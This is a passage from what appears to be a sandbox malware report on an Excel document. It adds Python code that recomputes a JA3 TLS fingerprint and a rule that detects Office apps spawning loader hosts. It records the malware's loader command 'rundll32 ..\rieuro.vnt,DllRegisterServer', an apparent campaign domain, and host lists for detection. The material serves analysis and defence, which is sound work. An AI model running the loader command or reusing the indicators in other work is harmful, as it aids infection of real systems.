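        ext_blob += etype.to_bytes(2, "big") + len(data).to_bytes(2, "big") + data
    body = (int(version).to_bytes(2, "big") + bytes(32) + b"\x00"          # version, random, empty session id
            + (2 * len(ciphers)).to_bytes(2, "big") + b"".join(c.to_bytes(2, "big") for c in ciphers)
            + b"\x01\x00"                                                  # one compression method: null
            + len(ext_blob).to_bytes(2, "big") + ext_blob)
    return b"\x01" + len(body).to_bytes(3, "big") + body                   # handshake type 1 + 3-byte length


def ja3_from_client_hello(msg):
    """Parse a ClientHello handshake message (record layer already removed) into the JA3 string."""
    if msg[0] != 1:
        raise ValueError("not a ClientHello")
    body = msg[4:4 + int.from_bytes(msg[1:4], "big")]
    version = int.from_bytes(body[0:2], "big")
    pos = 34                                              # version + 32-byte random
    pos += 1 + body[pos]                                  # session id
    n = int.from_bytes(body[pos:pos + 2], "big")
    pos += 2
    ciphers = [int.from_bytes(body[i:i + 2], "big") for i in range(pos, pos + n, 2)]
    pos += n
    pos += 1 + body[pos]                                  # compression methods
    exts, groups, formats = [], [], []
    if pos < len(body):
        end = pos + 2 + int.from_bytes(body[pos:pos + 2], "big")
        pos += 2
        while pos < end:
            etype = int.from_bytes(body[pos:pos + 2], "big")
            elen = int.from_bytes(body[pos + 2:pos + 4], "big")
            data = body[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            exts.append(etype)
            if etype == 10:
                cnt = int.from_bytes(data[0:2], "big")
                groups = [int.from_bytes(data[i:i + 2], "big") for i in range(2, 2 + cnt, 2)]
            elif etype == 11:
                formats = list(data[1:1 + data[0]])

    def fmt(values):
        return "-".join(str(v) for v in values if v not in GREASE)

    return ",".join([str(version), fmt(ciphers), fmt(exts), fmt(groups), fmt(formats)])


def ja3_digest(ja3):
    """The JA3 digest is MD5 over the five comma-separated fields, nothing more."""
    return hashlib.md5(ja3.encode()).hexdigest()


if __name__ == "__main__":
    hello = build_client_hello(REPORT_JA3, sni="helendunnosteopathy.co.uk")
    recovered = ja3_from_client_hello(hello)
    print(recovered)
    print("computed digest:", ja3_digest(recovered), " report digest:", REPORT_DIGEST)
```

                Running the block prints the digest of the recovered string next to the value in the table; the two agree when the printed fingerprint string is exactly what the sandbox hashed. To apply the parser to real traffic, feed it the handshake message from the first client-to-server TLS record (strip the 5-byte record header first).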

                Code Manipulations

                System Behavior

                General

                Start time:20:35:39
                Start date:22/02/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fe00000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:20:35:44
                Start date:22/02/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\rieuro.vnt,DllRegisterServer
                Imagebase:0xffdb0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
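                Added example (not from the report): a detection pass over constructed Sysmon Event ID 1 style process-creation events, the first of which reproduces the EXCEL.EXE to rundll32.exe pair and the command line recorded above. It flags an Office parent spawning a script or loader host, a rundll32 module whose extension is not .dll, a module given by a relative path, and DllRegisterServer invoked through rundll32 rather than regsvr32. The benign control events, the field names and the host lists are the example's own.

```python
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SCRIPT_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "powershell.exe", "certutil.exe", "msiexec.exe"}

# Constructed process-creation events (Sysmon Event ID 1 field names). The first copies the
# parent/child pair and command line from the report's process list; the others are benign controls.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\rieuro.vnt,DllRegisterServer"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Program Files\Vendor\update.dll",Install'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

# argv[0] (quoted or not), then "module,export" where the module may be quoted.
RUNDLL32_ARGS = re.compile(r'^\s*(?:"[^"]*"|\S+)\s+(?:"([^"]+)"|([^",\s]+))\s*,\s*(\S+)')


def parse_rundll32(cmdline):
    """Split a rundll32 command line into (module path, export name); None without a module,export pair."""
    m = RUNDLL32_ARGS.match(cmdline)
    if not m:
        return None
    return (m.group(1) or m.group(2), m.group(3))


def reasons_for(event):
    """Every reason one process-creation event looks like an Office-delivered loader."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    reasons = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    if image == "rundll32.exe":
        parsed = parse_rundll32(event["CommandLine"])
        if parsed:
            module, export = parsed
            ext = ntpath.splitext(module)[1].lower()
            if ext != ".dll":
                reasons.append(f"module extension is {ext or '(none)'}, not .dll")
            if not ntpath.isabs(module):
                reasons.append("module given by relative path")
            if export.lower() == "dllregisterserver":
                reasons.append("DllRegisterServer invoked through rundll32 rather than regsvr32")
    return reasons


def detect(events):
    """Return (event index, reasons) for every event that triggers at least one reason."""
    hits = []
    for index, event in enumerate(events):
        reasons = reasons_for(event)
        if reasons:
            hits.append((index, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in detect(EVENTS):
        print(f"event {index}: {EVENTS[index]['CommandLine']}")
        for reason in reasons:
            print("   -", reason)
```

                The parent/child pair alone already matches this sample, but the three command-line checks are what keep the rule useful once an operator starts tuning: a signed vendor DLL loaded by an absolute path from svchost.exe produces no reason, while a loader named rieuro.vnt reached through a relative path produces three on its own.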

                Disassembly

                Code Analysis
